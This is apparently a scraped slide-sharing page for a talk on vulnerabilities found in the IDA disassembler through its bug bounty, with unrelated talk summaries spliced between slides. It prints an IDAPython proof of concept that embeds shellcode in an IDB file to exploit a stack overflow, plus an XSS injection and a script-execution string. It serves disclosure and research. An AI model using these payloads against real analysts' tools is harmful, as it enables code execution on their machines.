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IDA’s Vulnerabilities and Bug
Bounty Program	
Masaaki Chida
!  Security Engineer
!  Interested in Reverse Engineering
!  Participant in the sutegoma2 CTF team
What is IDA?	
!  Fully Featured Disassembler
!  Static analysis software used for analyzing malware etc.
!  Hex-rays’ Bug Bounty Program
!  3000 USD Reward
!  Rewards for remote attacks against IDA and the Hex-rays
!  Started around February 2011
!  By January 2014, there were 11 bounties awarded
Bug Bounty Program Impressions	
!  Identified various types of vulnerabilities, more than
!  Hex-rays responded rapidly
!  During normal business hours, email replies were immediate
!  They also sent patches if the fixes were quick
!  Parts that were difficult
!  Creating the proof of concept exploit code
!  Reproducing file formats
!  Writing reports
!  English
!  Writing vulnerability details for people other than security engineers

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Hunting for security bugs in AEM webapps

Presented on Hacktivity 2018 conference -

Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
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Presentation from Hackfest 2016 describing my experience joining HackerOne and reporting over 100 vulnerabilities in my first 11 months.

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AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs

Presentation from LevelUp 0x03 conference -

aemhackingbug hunting
Research Methodology	
!  Analysis in IDA
!  IDA Main Program (for windows)
!  Loader Modules
!  Processor Modules
!  Plugins
!  Read the SDK plugins’ source code
!  Observed the running processes’ actions
!  Sysinternals Tools: Procmon
Investigating functions that handle IO
!  Data Read & Copy
!  read, lread, eread, qread, qlread, qfread,
!  memcpy, strcpy, strncpy, qstrncpy, …
!  IDB Database
!  get_long, get_byte, ger_many_bytes,
!  netnode_getblob, netnode_altval, netnode_supval,
!  unpack_dd, unpack_ds, unpack_dw, …
!  Heap Allocation
!  malloc, calloc, realloc
!  qalloc, qcalloc, qrelloc
!  qvecto_reserve
Script and command execution functions	
!  IDC Script
!  CompileEx, CompileLineEx
!  str2ea, calcexpr, calcexpr_long, calc_idc_expr,
!  Eval, ExecIDC, Execute File, Execute Line,…
!  Command Execution
!  call_system
!  system, CrateProcess,…
Summary of Identified IDA Vulnerabilities	
!  Heap Overflow => Many
!  Stack Overflow => 2
!  DLL, Script Preloading => Many
!  Path Traversal => Several
!  Automatic IDC script execution
!  Automatic debugger execution
!  ※These include bugs that were not eligible for bounty

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WebDav implementations are complex and have many vulnerabilities. Hackers should test for XXE issues by sending XML payloads to methods like PROPPATCH and PROPFIND. XXE can be used to read files on the system or perform SSRF. Other issues include CSRF, authentication bypass by overwriting configuration files, and DoS attacks using large payloads. Developers should carefully follow security best practices for XML parsing and input validation when building WebDav services.

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Securing AEM webapps by hacking them
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Slides from adaptTo() 2019 -

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Bug bounty
Bug bountyBug bounty
Bug bounty

This document discusses bug bounty programs (BBPs), which reward security researchers for responsibly disclosing software vulnerabilities. It introduces BBPs, noting they save companies money while improving security. Major companies like Google and Facebook run BBPs. The document outlines prerequisites for BBPs like learning security testing techniques. It provides tips for finding vulnerabilities like understanding a site's scope, tools, and avoiding duplicate reports. Common vulnerability types in BBPs include injection flaws and insecure data storage.

Integer Overflow Vulnerabilities	
!  Problems
!  Almost all modules were a target
!  No integer overflow protections
!  Even functions like qcalloc were unprotected
By exploiting buffer overflows it is possible to execute
arbitrary code in many of the modules
void *__cdecl qcalloc(size_t nitems, size_t itemsize) {
void *result; // eax@2
void *v3; // ebx@3
if ( (signed int)(itemsize * nitems) > 0 ) {
v3 = calloc(itemsize * nitems, 1u);
Integer Signedness Vulnerability	
!  Problem
!  Target was the AIF Loader Module
!  Stack buffer overflow occurs during analysis of the section
By exploiting the stack based buffer overflow it was possible
to execute arbitrary code.
Classic Buffer Overflow Vulnerabilities	
!  Problems
!  Target was the .NET Processor Module
!  Binary to hex string conversion process
!  netnode_getblob() did not validate the size of the input data
By exploiting stack based buffer overflows it was possible
to execute arbitrary code
Classic Buffer Overflow Vulnerability	
!  #For Windows XP SP3 Japanese Edition
!  from idaapi import *;from struct import *
!  a = 0x5874768A-0x24; b = 0x5874764A-0x14
!  shellcode="htIIGX5tIIGHWPPPSRPPafhExfXf5YrfPDfhS3DTY09fhpzfXf5rRfPDTY01f
!  payload=("1"*8)+(pack("II",a,b)*(9334/8-1))+("x55"*6)
!  payload+=shellcode
!  payload+=("1"*((len(shellcode)&4)+10-(len(shellcode)%4)))+
!  node_id=netnode("$ cli").altval(0x0C000014,'o')
!  netnode(node_id).setblob(payload,0,'o')
!  IDAPython script that inserts shellcode into an IDB file

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The document discusses various techniques attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes how to detect remotely launched executables using Windows Event and Sysmon logs. Specific techniques covered include remote file copy over SMB, remote execution via WMI, WinRM, Powershell Remoting, scheduled tasks, services, the registry, and WMI subscriptions. The document provides the event sequences and most interesting events to look for when hunting for evidence of each technique.

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Bug Bounty Basics
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Bug Bounty Basics

Who is a hacker? What is a bug bounty program? How do you get started with bug bounties? How much should I pay hackers who find bugs in my website and apps? All these questions and more are answered in our bug bounty basics booklet. Learn more about the market-leading bug bounty platform and how it is the ideal choice for continuous security testing at

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Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject client-side scripts into web pages viewed by other users. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM-based XSS. XSS has been one of the top vulnerabilities on the OWASP Top Ten list for many years. While XSS attacks can compromise user sessions and steal sensitive data, developers can prevent XSS through proper input sanitization and output encoding. As web applications continue to grow in use, jobs in web application security and penetration testing are also expected to increase significantly in the coming years.

HTML Injection Vulnerability	
!  Problem
!  Possible to inject arbitrary HTML when exporting analysis to
!  HTML entities were not being escaped
!  get_root_filename function
!  Qbasename function exhibits odd behavior
!  Calling qbasename(“x00:/path/filename”) returns “/path/filename”
Possible to execute XSS when opening the generated
HTML file
from idaapi import *
node=netnode("Root Node")
Preloading Vulnerability	
!  Problem
!  Automatically loads DLLs, IDC and IDAPython scripts from the
same directory containing the IDB file
!  ida.idc, userload.idc
!  windbg.exe, dbghelp.dll, dbgeng.dll, …
!,,, …
Possible to automatically read/execute unintended files,
allowing for arbitrary code execution
Problems with Debugger Settings	
!  Problem
!  Debug target applications can be UNC paths
!  The flag to ignore debugger startup warnings is saved in the
IDB file
Possible to run a malicious remote file without any warning
messages using the runtime debugger
Automatic Debugger Execution Vulnerability	
!  Problem
!  Debugger is automatically run during memory dump analysis
!  Automatic evaluation of debugger events
!  Event Condition,Watch PointView
Possible to execute malicious IDC script when loading an
IDB file made from a memory dump

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Bug Bounty Secrets
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Bug Bounty Secrets

Bug bounty programs involve paying security researchers rewards for finding vulnerabilities in companies' products. To participate, researchers need to understand the target company's products and domains, know which companies offer bounties, and find bugs that are in scope like XSS, SQL injection, or authentication bypasses. Rewards can range from $100 to $20,000. Major companies like Google, Facebook, and Mozilla run bounty programs and have collectively paid over $1 million to researchers. Examples are shown of real bugs found and reported through bounty programs. The conclusion encourages reporting bugs to companies rather than selling vulnerabilities.

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Hunting for Credentials Dumping in Windows Environment

My slides from Zero Nights 2017 talk -

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OWASP AppSecCali 2015 - Marshalling Pickles

Marshalling Pickles: how deserializing objects can ruin your day.

Automatic IDC Script Execution
!  Problem
!  Target was the .NET Processor Module
!  Using IDA’s hint dialog
!  1. get string of text below the line of the cursor
!  2. Pass it to the extract_name function
!  3. Pass it to the str2ea function
!  Behavior of the extract_name function is different
!  Control characters present in the NameChars item
within ida.cfg
!  IDC Script is implicitly run from the str2ea function parameters
Possible to execute malicious script when parsing .NET
Behavioral Differences in extract_name	
[X86, ARM Processor Module, etc…]
Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0)
.text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, …
.text:00401000 db 'Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))',0
[.NET Processor Module]
Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0)
.method private static hidebysig void Main(string[] args)
    ldstr "Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))“
When positioning the cursor over ”db ‘Exec(char(0x63…” in x86,
nothing occurs. Internally, str2ea(‘Exec’) is executed.
However, in .NET moving the cursor over ”ldstr “Exec(char(0x63…”
causes calc to be popped. Internally, str2ea(‘Exec(“calc”)’) is
!  Lots of easy to find vulnerabilities still exist
!  I think bug bounty programs help in reducing vulnerability
!  I want there to be more bug bounty programs
!  There are other bug bounty programs already running
!  Those who are interested should join!

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# By Frans Rosén Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers. Then came security. Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentialy exposed an international multi billion dollar company using only sad thoughts. # About speaker Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne. Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time and the results of his security research has been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.

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remote-method-guesser - BHUSA2021 Arsenal

Slides from the Black Hat USA 2021 Arsenal presentation of remote-method-guesser. Recording: remote-method-guesser (rmg) is a Java RMI vulnerability scanner that checks for common misconfigurations on Java RMI endpoints. It combines well known techniques for RMI enumeration with detection capabilities for lesser known attack vectors that are often missed. Apart from detecting RMI vulnerabilities, remote-method-guesser can perform attack operations for each supported vulnerability type. The following list shows some of it's currently supported operations: * List available bound names and their interface class names * List codebase locations (if exposed by the remote server) * Check for known vulnerabilities (enabled class loader, missing JEP290, JEP290 bypasses, localhost bypass (CVE-2019-2684)) * Identify existing remote methods by using a bruteforce (wordlist) approach * Call remote methods with user specified arguments (no manual coding required) * Call remote methods with ysoserial gadgets within the arguments * Call remote methods with a client specified codebase (remote class loading attack) * Perform DGC, registry and activator calls with ysoserial gadgets or a client specified codebase * Perform bind, rebind and unbind operations against an RMI registry * Bypass registry deserialization filters by using An Trinhs registry bypass * Enumerate the unmarshalling behavior of java.lang.String * Create Java code dynamically to invoke remote methods manually


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IDA Vulnerabilities and Bug Bounty  by Masaaki Chida

  • 1. IDA’s Vulnerabilities and Bug Bounty Program Masaaki Chida
  • 2. Profile !  Security Engineer !  Interested in Reverse Engineering !  Participant in the sutegoma2 CTF team
  • 3. What is IDA? !  Fully Featured Disassembler !  Static analysis software used for analyzing malware etc. !  Hex-rays’ Bug Bounty Program !  3000 USD Reward !  Rewards for remote attacks against IDA and the Hex-rays Decompiler !  Started around February 2011 !  By January 2014, there were 11 bounties awarded
  • 4. Bug Bounty Program Impressions !  Identified various types of vulnerabilities, more than expected !  Hex-rays responded rapidly !  During normal business hours, email replies were immediate !  They also sent patches if the fixes were quick !  Parts that were difficult !  Creating the proof of concept exploit code !  Reproducing file formats !  Writing reports !  English !  Writing vulnerability details for people other than security engineers
  • 5. Research Methodology !  Analysis in IDA !  IDA Main Program (for windows) !  Loader Modules !  Processor Modules !  Plugins !  Read the SDK plugins’ source code !  Observed the running processes’ actions !  Sysinternals Tools: Procmon
  • 6. Investigating functions that handle IO !  Data Read & Copy !  read, lread, eread, qread, qlread, qfread, !  memcpy, strcpy, strncpy, qstrncpy, … !  IDB Database !  get_long, get_byte, ger_many_bytes, !  netnode_getblob, netnode_altval, netnode_supval, !  unpack_dd, unpack_ds, unpack_dw, … !  Heap Allocation !  malloc, calloc, realloc !  qalloc, qcalloc, qrelloc !  qvecto_reserve
  • 7. Script and command execution functions !  IDC Script !  CompileEx, CompileLineEx !  str2ea, calcexpr, calcexpr_long, calc_idc_expr, !  Eval, ExecIDC, Execute File, Execute Line,… !  Command Execution !  call_system !  system, CrateProcess,…
  • 8. Summary of Identified IDA Vulnerabilities !  Heap Overflow => Many !  Stack Overflow => 2 !  DLL, Script Preloading => Many !  Path Traversal => Several !  Automatic IDC script execution !  Automatic debugger execution !  ※These include bugs that were not eligible for bounty rewards
  • 9. Integer Overflow Vulnerabilities !  Problems !  Almost all modules were a target !  No integer overflow protections !  Even functions like qcalloc were unprotected By exploiting buffer overflows it is possible to execute arbitrary code in many of the modules void *__cdecl qcalloc(size_t nitems, size_t itemsize) { void *result; // eax@2 void *v3; // ebx@3 if ( (signed int)(itemsize * nitems) > 0 ) { v3 = calloc(itemsize * nitems, 1u);
  • 10. Integer Signedness Vulnerability !  Problem !  Target was the AIF Loader Module !  Stack buffer overflow occurs during analysis of the section name By exploiting the stack based buffer overflow it was possible to execute arbitrary code.
  • 11. Classic Buffer Overflow Vulnerabilities !  Problems !  Target was the .NET Processor Module !  Binary to hex string conversion process !  netnode_getblob() did not validate the size of the input data By exploiting stack based buffer overflows it was possible to execute arbitrary code
  • 12. Classic Buffer Overflow Vulnerability !  #For Windows XP SP3 Japanese Edition !  from idaapi import *;from struct import * !  a = 0x5874768A-0x24; b = 0x5874764A-0x14 !  shellcode="htIIGX5tIIGHWPPPSRPPafhExfXf5YrfPDfhS3DTY09fhpzfXf5rRfPDTY01f RDfhpQDTY09fh3NfXf50rfPfharfXf5dsfPDTY09hBzPKX5ceLJPDfhptDfh9tDTY01fh6Of Xf5jAfPDTY09hinEufhKWDfhkdfXf5WcfPfhnLfXf5g2fPDTY09fhgRDTY01fhQBfhdtfXf5 QXfPDfhlHDTY09fhaefXf57jfPDfh5PfXf5lVfPDTY09h7YqoX5RFUnPDfhjLDfhttDTY09f h8wfXf5PvfPDTY09h3YIXX54FiYPDfhatDfhgtDTY01fh7xDfh8pfXf5dofPfhitDTY09fhl zfXf53FfPfhYtDTY09fhGSfXf59KfPfhWtDTY01fhG0DfhRtTYf19fh3ZfXf55VfPDfhnvDf h5tDTY01fh6tfXf5FxfPDfhRvDfhJtDTY09fhr0fhCtDTY01hJRVdDfhlKfXf5MRfPDTY09f hUvDTY09fhmwDfhB4fXf5xhfPhdohchshinfhUifXf5C5fPDhehwshhystfhYjfXf5I6fPDh hm32hcalchexehfhTHfXf54ffPDfhRhfhKifXf5YDfPDTY09fhU1DRVWRTFfVNfhjsfXf5Er fPVUafhrWfYf1Lo9f1To9TXLLLrH“ !  payload=("1"*8)+(pack("II",a,b)*(9334/8-1))+("x55"*6) !  payload+=shellcode !  payload+=("1"*((len(shellcode)&4)+10-(len(shellcode)%4)))+ (pack("II",a,b)*(16000/8)) !  node_id=netnode("$ cli").altval(0x0C000014,'o') !  netnode(node_id).setblob(payload,0,'o') !  IDAPython script that inserts shellcode into an IDB file
  • 13. HTML Injection Vulnerability !  Problem !  Possible to inject arbitrary HTML when exporting analysis to HTML !  HTML entities were not being escaped !  get_root_filename function !  Qbasename function exhibits odd behavior !  Calling qbasename(“x00:/path/filename”) returns “/path/filename” Possible to execute XSS when opening the generated HTML file from idaapi import * node=netnode("Root Node") node.set(“x00:</title><scritp>alert('XSS')</script>") save_database()
  • 14. Preloading Vulnerability !  Problem !  Automatically loads DLLs, IDC and IDAPython scripts from the same directory containing the IDB file !  ida.idc, userload.idc !  windbg.exe, dbghelp.dll, dbgeng.dll, … !,,, … Possible to automatically read/execute unintended files, allowing for arbitrary code execution
  • 15. Problems with Debugger Settings !  Problem !  Debug target applications can be UNC paths !  The flag to ignore debugger startup warnings is saved in the IDB file Possible to run a malicious remote file without any warning messages using the runtime debugger
  • 16. Automatic Debugger Execution Vulnerability !  Problem !  Debugger is automatically run during memory dump analysis !  Automatic evaluation of debugger events !  Event Condition,Watch PointView Possible to execute malicious IDC script when loading an IDB file made from a memory dump
  • 17. Automatic IDC Script Execution Vulnerability !  Problem !  Target was the .NET Processor Module !  Using IDA’s hint dialog !  1. get string of text below the line of the cursor !  2. Pass it to the extract_name function !  3. Pass it to the str2ea function !  Behavior of the extract_name function is different !  Control characters present in the NameChars item within ida.cfg !  IDC Script is implicitly run from the str2ea function parameters Possible to execute malicious script when parsing .NET files str2ea calcexpr_lon g calc_idc_expr CompileLine Ex Run
  • 18. Behavioral Differences in extract_name [X86, ARM Processor Module, etc…] Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0) Exec --------------------------------------------------------------- .text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, … .text:00401000 db 'Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))',0 [.NET Processor Module] Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0) Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63)) --------------------------------------------------------------- .method private static hidebysig void Main(string[] args) {     ldstr "Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))“ } When positioning the cursor over ”db ‘Exec(char(0x63…” in x86, nothing occurs. Internally, str2ea(‘Exec’) is executed. However, in .NET moving the cursor over ”ldstr “Exec(char(0x63…” causes calc to be popped. Internally, str2ea(‘Exec(“calc”)’) is executed.
  • 19. DEMO
  • 20. Summary !  Lots of easy to find vulnerabilities still exist !  I think bug bounty programs help in reducing vulnerability !  I want there to be more bug bounty programs !  There are other bug bounty programs already running !  Those who are interested should join!
  • 21. Q&A